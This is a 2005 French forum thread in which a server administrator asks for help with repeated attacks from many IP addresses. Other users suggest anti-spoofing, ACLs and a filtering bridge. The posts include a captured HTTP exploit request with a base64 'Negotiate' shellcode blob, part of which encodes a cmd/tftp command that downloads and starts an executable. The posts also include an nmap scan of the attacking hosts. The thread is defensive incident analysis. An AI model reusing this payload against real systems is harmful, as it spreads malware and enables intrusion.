Attaques sur serveur / recherche explications ... - réseaux et sécurité - Linux et OS Alternatifs
Marsh Posté le 04-06-2005 à 20:19:36
L'intrusion continue ...
Une petite analyse des trames reçues (IP source : 83.198.230.251)
83.198.176.184 étant l'adresse du serveur
Connexion TCP (syn/syn-ack/ack)
Puis ...
ET / HTTP/1.0\r\n
Host: 83.198.176.184\r\n
Authorization: Negotiate
YIIQegYGKwYBBQUCoIIQbjCCEGqhghBmI4IQY
gOCBAEAQUFBQUFBQUFBQUFBQUFBQUFBQUFBQU
FBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUF
BQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFB
QUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQ
UFBQUFBQUFBQUFBQUFBQUFBQUFBQUoAkEKQQp
BCkEKBxFTy///86EYAAACLRTyLfAV4Ae+LTxi
LXyAB6+MuSYs0iwHuMcCZrITAdAfByg0Bwuv0
etc ..
JCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJ
CQkJCQkJCQkJCQkJCQkJCQkJCQJCQkJCQkJCQ
kJCQkkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQ
JCQkJCQkJCQkJCQkkJCQkJCQkJCQkJCQkJCQk
JCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJ
CQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJC
etc ..
Tentative de Buffer Overflow ?
Marsh Posté le 04-06-2005 à 21:27:06
sneakz a écrit : Je viens de loguer plusieurs attaques identiques sur mon serveur. |
active l'antispoof illico.
tu as quoi comme fw ?
Marsh Posté le 04-06-2005 à 21:31:52
L'antispoofing du kernel ne permet pas cet anti-spoofing (du moins si tu parles de rp_filter)...
Marsh Posté le 04-06-2005 à 21:42:58
l0ky a écrit : L'antispoofing du kernel ne permet pas cet anti-spoofing (du moins si tu parles de rp_filter)... |
c du spoof externe, il te faut un antispoof se basant sur plusieurs param. :
- mac adress
- ip adresse,
- numero de sequence
- analyse de la fenetre tcp-ip
Sinon ta pile et l'anti-spoof kernel sont aveugles. (en clair il detectes et bloque du spoof sur d'eventuel paquets venant chez toi -entrant par la patte wan donc- ayant une adresse de ton lan)... mais pour les autres spoof (et nbreux types) lui pas connaitre.
C pour ça que je n'ai plus la pretention de coder netfilter pour qu'il bloque tout les types de spoof existants ...
j'ai un fw semi pro (zyos derivé d'une xbsd).
Marsh Posté le 05-06-2005 à 14:53:01
Merci pour les infos complémentaires. Je ne sais pas comment peut fonctionner un anti-spoofing (étrange !! si le paquet est forgé ... ! je vais me documenter pour mieux comprendre le process).
Quant à mon fw, il est rudimentaire via une couche applicative sur mon routeur.
Je suis en train de configurer une machine en tant que pont filtrant avec des règles IPTABLES plus fines que celles du routeur.
Ps : (zyos derivé d'une xbsd) --> qu'est-ce ?
Marsh Posté le 05-06-2005 à 22:48:27
sneakz a écrit : Merci pour les infos complémentaires. Je ne sais pas comment peut fonctionner un anti-spoofing (étrange !! si le paquet est forgé ... ! je vais me documenter pour mieux comprendre le process). |
ben deja regles bien les acl du routeur et fais lui faire le nat.
l'idée de passer ton pont filtrant est bonne : tu veux faire du bridge (cad no ip, mais en mac)
c une tres bonne methode.
ps: zyos , pour les firewall zyxell => cf le zywall 5
Marsh Posté le 24-06-2005 à 19:32:22
Re.
Je ne parviens pas à me détacher de ces requêtes HTTP.
A priori, le même individu ou la même organisation.
Dans les 10 minutes qui précèdent ce post :
3 ip différentes et actives (ping positif)
- 83.192.80.156
- 83.198.70.29
- 83.198.204.39
Un nmap sur chacune d'elle me renvoie la même sortie (vraissembablement un honeypot)
nmap -sS -sV -O -F -PI -T4 83.198.204.39
Starting nmap 3.70 ( http://www.insecure.org/nmap/ ) at 2005-06-24 19:18 CEST
Interesting ports on ALille-153-1-25-39.w83-198.abo.wanadoo.fr (83.198.204.39):
(The 1212 ports scanned but not shown below are in state: closed)
PORT STATE SERVICE VERSION
135/tcp filtered msrpc
139/tcp open netbios-ssn
445/tcp filtered microsoft-ds
1025/tcp open msrpc Microsoft Windows msrpc
1720/tcp filtered H.323/Q.931
5000/tcp open upnp Microsoft Windows UPnP
Device type: general purpose
Running: Microsoft Windows 95/98/ME|NT/2K/XP
OS details: Microsoft Windows Millennium Edition (Me), Windows 2000 Professional or Advanced Server, or Windows XP
Des idées sont les bienvenues !!
Marsh Posté le 24-06-2005 à 21:07:21
http://www.forbiddenweb.org/viewtopic.php?id=33961
Essaie decoder le contenu du packet HTTP (base64). Tu apres du padding tu devrais pouvoir voir la commande qu'ils essaient d'executer sur ta machine.
Marsh Posté le 24-06-2005 à 21:42:17
merci matafan pour ta contribution.
Le lien semble intéressant. Je vais prendre le temps de l'étudier.
Marsh Posté le 25-06-2005 à 11:05:45
J'ai essayé de décoder base64 sur les données qui n'apparaissent pas être du Padding et je ne vois pas apparaître de commandes particulières (ggrrrr).
Ci-dessous le contenu des données :
FBQQMAI4IMVwOCBAoAkEKQQpBCkEKBxFTy///
86EYAAACLRTyLfAV4Ae+LTxiLXyAB6+MuSYs0i
wHuMcCZrITAdAfByg0Bwuv0O1QkBHXji18kAetmi
wxLi18cAeuLHIsB64lcJATDMcBki0AwhcB4D4tADIt
wHK2LaAjpCwAAAItANAV8AAAAi2g8XzH2YFbrD
WjvzuBgaJj+ig5X/+fo7v///2NtZCAvYyB0ZnRwIC1pI
DauMC4wLjAgR0VUIHd1YW1rb3BzLmV4ZSZzdGF
ydCB3dWFta29wcy5leGUmZXhpdABCE...t.@.z.g.S...
.......Pr.E..U.eP.......OCCDkDggQRAENDQ0Mg8P1/U1
ZXZoHsgACJ5ujtAAAA/zZoCRLWY+j3AAAAiUYI6
KIAAAD/dgRoa9AryujiAAAAiUYM6D8AAAD/dgRo
+pcCTOjNAAAAMdtoEAQAAFP/0InDVot2EInHuRA
EAADzpF4xwFBQUFNQUP9WDItGCGaBxIAAX15b/
+Bg6CMAAACLRCQMjVh8g0M8BYFDKAAQAACB
YygA8P//iwQkg8QUUDHAwzHSZP8yZIkiMdu4kEKQ
QjHJsQKJ3/OvdAND6/OJfhBkjwJYYcNgvyDw/X+LH
4tGCIkHi3/4gcd4AQAAifk5GXQEiwnr+In6OVoEdAW
LugTr9okRiUoExkP9AWHDoQzw/X+LQByLWAiJHo
sAi0AIiUYEw2CLbCQoi0U8i1QFeAHqi0oYi1ogAevjO
EmLNIsB7jH/McD8rDjgdAfBzw0Bx+v0O3wkJHXhi1o
kAetmiwxLi1ocAeuLBIsB6IlEJBxhwggA6/5
Je reste bloqué .. (dans les 2 sens du terme) !!
Marsh Posté le 25-06-2005 à 12:59:39
Dans l'analyse de la trame avec Ethereal j'ai trouvé ceci :
NTLMSSP
NTLMSSP identifier: `\202\020z\006\006+\006
NTLM Message Type: Unknown (0x02050501)
Unrecognized NTLMSSP Message
Utile ?
NTLMSSP : j'ai vu que cela correspondait à NT Lan Manager security service permissions.
Tiens quelque chose de similaire ici : http://www.usenetlinux.com/t-430981.html
Marsh Posté le 03-06-2005 à 18:29:52
Je viens de loguer plusieurs attaques identiques sur mon serveur.
"Microsoft IIS 5.0 Indexed Directory Disclosure Vulnerability"
'If Index Server is enabled in Microsoft Internet Information Server 5.0, it is possible for a remote user to view the entire root directory structure and all sub-directories due to a flaw in the Web Distributed Authoring and Versioning (WebDAV) search implementation. Hidden directories, include files (*.inc), or other documents that would not normally be accessible through the regular website interface can be exposed through this exploit.'
Ces attaques se sont succédées à des intervalles de temps espacés alternativement de 2 minutes puis 4 minutes en provenance d'IP différentes.
83.198.205.219:3840
83.198.6.130:1379
83.198.79.154:4783
83.198.87.12:4826
83.198.117.145:3878
83.198.227.128:191
83.198.219.52:3831
83.198.151.134:3852
83.198.6.130:3895
83.198.84.31
83.198.151.83
83.198.107.249
83.198.154.150
83.198.78.123
83.198.8.71
83.198.52.210
83.198.154.150
Comment l'attaquant as-tu pu réaliser cela ?
1) je ne pense pas qu'il ait pu spoofé les différentes machines
2) je ne pense pas qu'il utilise des proxies (j'ai scanné quelques unes d'entre elles et je n'ai pas vu de trace de proxy)
3) je pense qu'il a utilisé plusieurs machines physique dans un même lieu et cela apparaît également étrange.
4) hypothèse 3 qui ne tient pas la route dans la mesure, où il utilise beaucoup trop d'IP différentes.
5) Il forge certainement des paquets mais auquel cas il n'a pas de retour
Je recherche des explications plausibles ...
Merci
Message édité par sneakz le 03-06-2005 à 20:04:42